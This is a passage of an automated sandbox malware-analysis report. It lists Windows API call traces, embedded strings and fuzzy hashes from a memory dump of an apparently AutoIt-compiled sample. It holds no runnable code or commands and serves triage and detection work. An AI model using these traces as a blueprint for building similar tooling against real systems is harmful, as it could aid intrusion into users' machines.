                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                            • String ID: *.*
                            • API String ID: 34673085-438819550
                            APIs
                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00446FA5
                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00446FA8
                            • GetWindowLongW.USER32(?,000000F0), ref: 00446FCC
                            • _memset.LIBCMT ref: 00446FDD
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00446FEF
                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00447067
                            Strings
                            Similarity
                            • API ID: MessageSend$LongWindow_memset
                            • String ID: `$
                            • API String ID: 830647256-74666722
                            APIs
                            • GetDC.USER32(00000000), ref: 0043738F
                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0043739B
                            • CreateCompatibleDC.GDI32(?), ref: 004373A7
                            • SelectObject.GDI32(00000000,?), ref: 004373B4
                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00437408
                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00437444
                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00437468
                            • SelectObject.GDI32(00000006,?), ref: 00437470
                            • DeleteObject.GDI32(?), ref: 00437479
                            • DeleteDC.GDI32(00000006), ref: 00437480
                            • ReleaseDC.USER32(00000000,?), ref: 0043748B
                            Strings
                            Similarity
                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                            • String ID: (
                            • API String ID: 2598888154-3887548279
                            • Opcode ID: 54d6c1a7b08c73cc292accfb734968c98f3ccf383a8794a8af527ed403a7b33e
                            • Instruction ID: a58190f10d3e595cad14b8faeaf3c2d72e445e68926dea88c721b70377c91118
                            • Opcode Fuzzy Hash: 54d6c1a7b08c73cc292accfb734968c98f3ccf383a8794a8af527ed403a7b33e
                            • Instruction Fuzzy Hash: 495159B5904209EFDB24CFA8CC84EAFBBB9EF49310F14842EF99997250C775A845CB54
                            APIs
                              • Part of subcall function 003E0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,003C6B0C,?,00008000), ref: 003E0973
                              • Part of subcall function 003C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C4743,?,?,003C37AE,?), ref: 003C4770
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 003C6BAD
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003C6CFA
                              • Part of subcall function 003C586D: _wcscpy.LIBCMT ref: 003C58A5
                              • Part of subcall function 003E363D: _iswctype.LIBCMT ref: 003E3645
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                            • API String ID: 537147316-1018226102
                            • Opcode ID: 98f358ff6a0deadbb1507161441faf885cd2ca29d2abcae0a235c5d5d0026a08
                            • Instruction ID: ecb868dc73a035857d38eb72e4eb6ecd7b8f9f1aebb56c3d8058a2e5e15cf47d
                            • Opcode Fuzzy Hash: 98f358ff6a0deadbb1507161441faf885cd2ca29d2abcae0a235c5d5d0026a08
                            • Instruction Fuzzy Hash: B3027B311083449FC716EF24C841EAFBBE5AF95314F10492EF59A9B2A1DB30ED89CB52
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                            • String ID:
                            • API String ID: 3993528054-0
                            • Opcode ID: 344f4c6cf197484d057aa3042f4e23baa99067b6bae764388d88e2ecf67a2bfc
                            • Instruction ID: 5de8f4f5893b20324c87cf62a9cae423b2aab6121027ed46a59c2eb86690f520
                            • Opcode Fuzzy Hash: 344f4c6cf197484d057aa3042f4e23baa99067b6bae764388d88e2ecf67a2bfc
                            • Instruction Fuzzy Hash: 3D71D370700225BAEB218F54ED45FAABF64FF05354F500227F625A62E1CBF95C20EB59
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 004388D7
                            • CoInitialize.OLE32(00000000), ref: 00438904
                            • CoUninitialize.OLE32 ref: 0043890E
                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00438A0E
                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00438B3B
                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00452C0C), ref: 00438B6F
                            • CoGetObject.OLE32(?,00000000,00452C0C,?), ref: 00438B92
                            • SetErrorMode.KERNEL32(00000000), ref: 00438BA5
                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00438C25
                            • VariantClear.OLEAUT32(?), ref: 00438C35
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                            • String ID: ,,E
                            • API String ID: 2395222682-4052858919
                            • Opcode ID: 75255de88a2ea7e8c51b533625aee20d2372585896826a4fd18bc2559c7d7238
                            • Instruction ID: 1e37b22b2bc663f9adde337a44446a01253837a95c0a6d9628f723ae7bcca433
                            • Opcode Fuzzy Hash: 75255de88a2ea7e8c51b533625aee20d2372585896826a4fd18bc2559c7d7238
                            • Instruction Fuzzy Hash: 1EC126B1604305AFD700EF24C884A2BB7E9FF89348F00596EF9899B251DB75ED06CB56
                            APIs
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            • _memset.LIBCMT ref: 0041786B
                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004178A0
                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004178BC
                            • RegOpenKeyExW.ADVAPI32 ref: 004178D8
                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00417902
                            • CLSIDFromString.OLE32(?,?), ref: 0041792A
                            • RegCloseKey.ADVAPI32(?), ref: 00417935
                            • RegCloseKey.ADVAPI32(?), ref: 0041793A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                            • API String ID: 1411258926-22481851
                            • Opcode ID: 852529f12c3655d765b4c8c2da620bbc0d92daeb981661413b3c6545ccaaaf6e
                            • Instruction ID: 1409b1713c650dd7c25e94b4724bc853b3186f4c74a50a086b001989df7df73f
                            • Opcode Fuzzy Hash: 852529f12c3655d765b4c8c2da620bbc0d92daeb981661413b3c6545ccaaaf6e
                            • Instruction Fuzzy Hash: 2F410976C14229AADB22EBA4DC85EEEB778BF14310F40406AE905A7261DB355D48CF94
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00440E31
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                            • API String ID: 3964851224-909552448
                            • Opcode ID: 7e4f4c599a87cde7ad081465039543d97c3c80de1406db68954e21c0e0213dc5
                            • Instruction ID: 41fecdc80e6b144f98c53e6c0a15a310f611e5562902b341f1df1abb70f07846
                            • Opcode Fuzzy Hash: 7e4f4c599a87cde7ad081465039543d97c3c80de1406db68954e21c0e0213dc5
                            • Instruction Fuzzy Hash: 1741B13250425A8BDF25EF10D855AEF3360BF11300F148436FD555B292DBB8ADABCBA4
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                            • String ID: 0$F$`$
                            • API String ID: 176399719-3434289740
                            • Opcode ID: bee403796c9c6c7659682d476922f192b32773e97311b7c659d30e72e5112c8e
                            • Instruction ID: c15b8deefcee8e379dcb0f8d3e69e445e6359980c579c32b0548d19f1d0be7d3
                            • Opcode Fuzzy Hash: bee403796c9c6c7659682d476922f192b32773e97311b7c659d30e72e5112c8e
                            • Instruction Fuzzy Hash: B641B878A01208EFEB20DFA4D884E9ABBF5FF09300F14056AF905A7361D775A910CF98
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003FE2A0,00000010,?,Bad directive syntax error,0044F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0041F7C2
                            • LoadStringW.USER32(00000000,?,003FE2A0,00000010), ref: 0041F7C9
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            • _wprintf.LIBCMT ref: 0041F7FC
                            • __swprintf.LIBCMT ref: 0041F81E
                            • MessageBoxW.USER32 ref: 0041F88D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                            • API String ID: 1506413516-4153970271
                            • Opcode ID: 8a78cfff991275dc9101d3bfb9fd087156da69ed1123b404428e43f46cce6e44
                            • Instruction ID: 245d587bc9889bbe271e82fcadf460a148f78eb19f8e636ed3546404d4a7a540
                            • Opcode Fuzzy Hash: 8a78cfff991275dc9101d3bfb9fd087156da69ed1123b404428e43f46cce6e44
                            • Instruction Fuzzy Hash: 2821953194021EEBCF12EF90CC49FEE7734BF14300F04446AF5056A1A2DB359958DB55
                            APIs
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                              • Part of subcall function 003C7924: _memmove.LIBCMT ref: 003C79AD
                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00425330
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00425346
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00425357
                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00425369
                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0042537A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: SendString$_memmove
                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                            • API String ID: 2279737902-1007645807
                            • Opcode ID: 893b0fc03801322168d51e438c56657c630a6a08396268f205f9e676d75d663b
                            • Instruction ID: 5d785e8045f13e508b56c2784f2062d2cc4edfb76cee1b7a81260d4c7b4dd231
                            • Opcode Fuzzy Hash: 893b0fc03801322168d51e438c56657c630a6a08396268f205f9e676d75d663b
                            • Instruction Fuzzy Hash: 4311DD31A9012979D724F661DC4AEFFBABCEB91B40F50046EB806E60D1EEB41C04CAA4
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                            • String ID: 0.0.0.0
                            • API String ID: 208665112-3771769585
                            • Opcode ID: 0f429ab8f552ce6c32d29be9e651371823de75394fce7d9e1093973b6a4f801a
                            • Instruction ID: d5607ec094370b87640e78076780e95f296b140df724ef3f7c1bdf81ebb3473e
                            • Opcode Fuzzy Hash: 0f429ab8f552ce6c32d29be9e651371823de75394fce7d9e1093973b6a4f801a
                            • Instruction Fuzzy Hash: 89113A35600124AFDB15BB70AC4AEEB77BCEF82311F4002BBF5559A191FF788E858658
                            APIs
                            • GetSysColorBrush.USER32 ref: 003C3074
                            • RegisterClassExW.USER32(00000030), ref: 003C309E
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003C30AF
                            • InitCommonControlsEx.COMCTL32(?), ref: 003C30CC
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C30DC
                            • LoadIconW.USER32 ref: 003C30F2
                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C3101
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            • API String ID: 2914291525-1005189915
                            • Opcode ID: 774f1ab47b95bda00127914ee85ba331db9ce9eb5b9a6556400fdb51b276013b
                            • Instruction ID: 37abb24cf7e7d8a26364838c6c3e773070d19e10d16a1a6a6e3803968846c4dd
                            • Opcode Fuzzy Hash: 774f1ab47b95bda00127914ee85ba331db9ce9eb5b9a6556400fdb51b276013b
                            • Instruction Fuzzy Hash: C33167B5800349EFDB00DFA4D888A9EBFF0FB0A310F14496EE480E62A0D3B90555CF99
                            APIs
                            • timeGetTime.WINMM ref: 00424F7A
                              • Part of subcall function 003E049F: timeGetTime.WINMM ref: 003E04A3
                            • Sleep.KERNEL32(0000000A), ref: 00424FA6
                            • EnumThreadWindows.USER32 ref: 00424FCA
                            • FindWindowExW.USER32 ref: 00424FEC
                            • SetActiveWindow.USER32 ref: 0042500B
                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00425019
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00425038
                            • Sleep.KERNEL32(000000FA), ref: 00425043
                            • IsWindow.USER32 ref: 0042504F
                            • EndDialog.USER32 ref: 00425060
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                            • String ID: BUTTON
                            • API String ID: 1194449130-3405671355
                            • Opcode ID: 5d7bb6f27661245b8bb2a5b82b5f2c6e4819374a8c88dfe23ebdd718094dc1c3
                            • Instruction ID: 30ebde697a55a697ed4afedbc875b812d25e4212df3601b48ebf1a1961c3db4f
                            • Opcode Fuzzy Hash: 5d7bb6f27661245b8bb2a5b82b5f2c6e4819374a8c88dfe23ebdd718094dc1c3
                            • Instruction Fuzzy Hash: F221CF74300601FFE7105F60FD88B2A3B69EB86349B46143DF105922B1CB798D048B6E
                            APIs
                            • GetSysColorBrush.USER32 ref: 003C3074
                            • RegisterClassExW.USER32(00000030), ref: 003C309E
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003C30AF
                            • InitCommonControlsEx.COMCTL32(?), ref: 003C30CC
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C30DC
                            • LoadIconW.USER32 ref: 003C30F2
                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C3101
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            • API String ID: 2914291525-1005189915
                            • Opcode ID: fac23773d91bd8a736ead6b0870665472671346a3fdd809085d6171fc893bce2
                            • Instruction ID: 3fbca67485123dabe42bbc105c36fb6ae3712294441b1bf69c70837a54737e2e
                            • Opcode Fuzzy Hash: fac23773d91bd8a736ead6b0870665472671346a3fdd809085d6171fc893bce2
                            • Instruction Fuzzy Hash: 7621F7B9D50608AFDB00EFA4EC48B9DBBF4FB09700F00453AF510A62A0D7B54558CFA9
                            APIs
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • CoInitialize.OLE32(00000000), ref: 0042D5EA
                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0042D67D
                            • SHGetDesktopFolder.SHELL32(?), ref: 0042D691
                            • CoCreateInstance.OLE32(00452D7C,00000000,00000001,00478C1C,?), ref: 0042D6DD
                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0042D74C
                            • CoTaskMemFree.OLE32(?), ref: 0042D7A4
                            • _memset.LIBCMT ref: 0042D7E1
                            • SHBrowseForFolderW.SHELL32(?), ref: 0042D81D
                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0042D840
                            • CoTaskMemFree.OLE32(00000000), ref: 0042D847
                            • CoTaskMemFree.OLE32(00000000), ref: 0042D87E
                            • CoUninitialize.OLE32 ref: 0042D880
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                            • String ID:
                            • API String ID: 1246142700-0
                            • Opcode ID: e8f3eff171414af168573af6188cbd038d4bacd4f081f83c8d3631d33b6dcff6
                            • Instruction ID: 8526ebe750a63a9b67f34449e96e40fa56ea53ff10ee592509823ba53fe1220e
                            • Opcode Fuzzy Hash: e8f3eff171414af168573af6188cbd038d4bacd4f081f83c8d3631d33b6dcff6
                            • Instruction Fuzzy Hash: 1FB12C75A00119AFDB04DFA4D888EAEBBB9FF49304F1084A9F809DB261DB34ED45CB54
                            APIs
                            • GetDlgItem.USER32(?,00000001), ref: 0041C283
                            • GetWindowRect.USER32(00000000,?), ref: 0041C295
                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0041C2F3
                            • GetDlgItem.USER32(?,00000002), ref: 0041C2FE
                            • GetWindowRect.USER32(00000000,?), ref: 0041C310
                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0041C364
                            • GetDlgItem.USER32(?,000003E9), ref: 0041C372
                            • GetWindowRect.USER32(00000000,?), ref: 0041C383
                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0041C3C6
                            • GetDlgItem.USER32(?,000003EA), ref: 0041C3D4
                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0041C3F1
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0041C3FE
                            Similarity
                            • API ID: Window$ItemMoveRect$Invalidate
                            • String ID:
                            • API String ID: 3096461208-0
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 0042A90B
                            • GetDriveTypeW.KERNEL32(00000061,004789A0,00000061), ref: 0042A9D5
                            • _wcscpy.LIBCMT ref: 0042A9FF
                            Strings
                            Similarity
                            • API ID: BuffCharDriveLowerType_wcscpy
                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                            • API String ID: 2820617543-1000479233
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004486FF
                            Strings
                            Similarity
                            • API ID: InvalidateRect
                            • String ID: `$
                            • API String ID: 634782764-74666722
                            APIs
                            Strings
                            Similarity
                            • API ID: __i64tow__itow__swprintf
                            • String ID: %.15g$0x%p$False$True
                            • API String ID: 421087845-2263619337
                            APIs
                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000), ref: 0044755E
                            • CreateCompatibleDC.GDI32(00000000), ref: 00447565
                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00447578
                            • SelectObject.GDI32(00000000,00000000), ref: 00447580
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044758B
                            • DeleteDC.GDI32(00000000), ref: 00447594
                            • GetWindowLongW.USER32(?,000000EC), ref: 0044759E
                            • SetLayeredWindowAttributes.USER32 ref: 004475B2
                            • DestroyWindow.USER32 ref: 004475BE
                            Strings
                            Similarity
                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                            • String ID: static
                            • API String ID: 2559357485-2160076837
                            APIs
                            • _memset.LIBCMT ref: 003E6E3E
                              • Part of subcall function 003E8B28: __getptd_noexit.LIBCMT ref: 003E8B28
                            • __gmtime64_s.LIBCMT ref: 003E6ED7
                            • __gmtime64_s.LIBCMT ref: 003E6F0D
                            • __gmtime64_s.LIBCMT ref: 003E6F2A
                            • __allrem.LIBCMT ref: 003E6F80
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E6F9C
                            • __allrem.LIBCMT ref: 003E6FB3
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E6FD1
                            • __allrem.LIBCMT ref: 003E6FE8
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E7006
                            • __invoke_watson.LIBCMT ref: 003E7077
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                            • String ID:
                            • API String ID: 384356119-0
                            APIs
                            • _memset.LIBCMT ref: 00422542
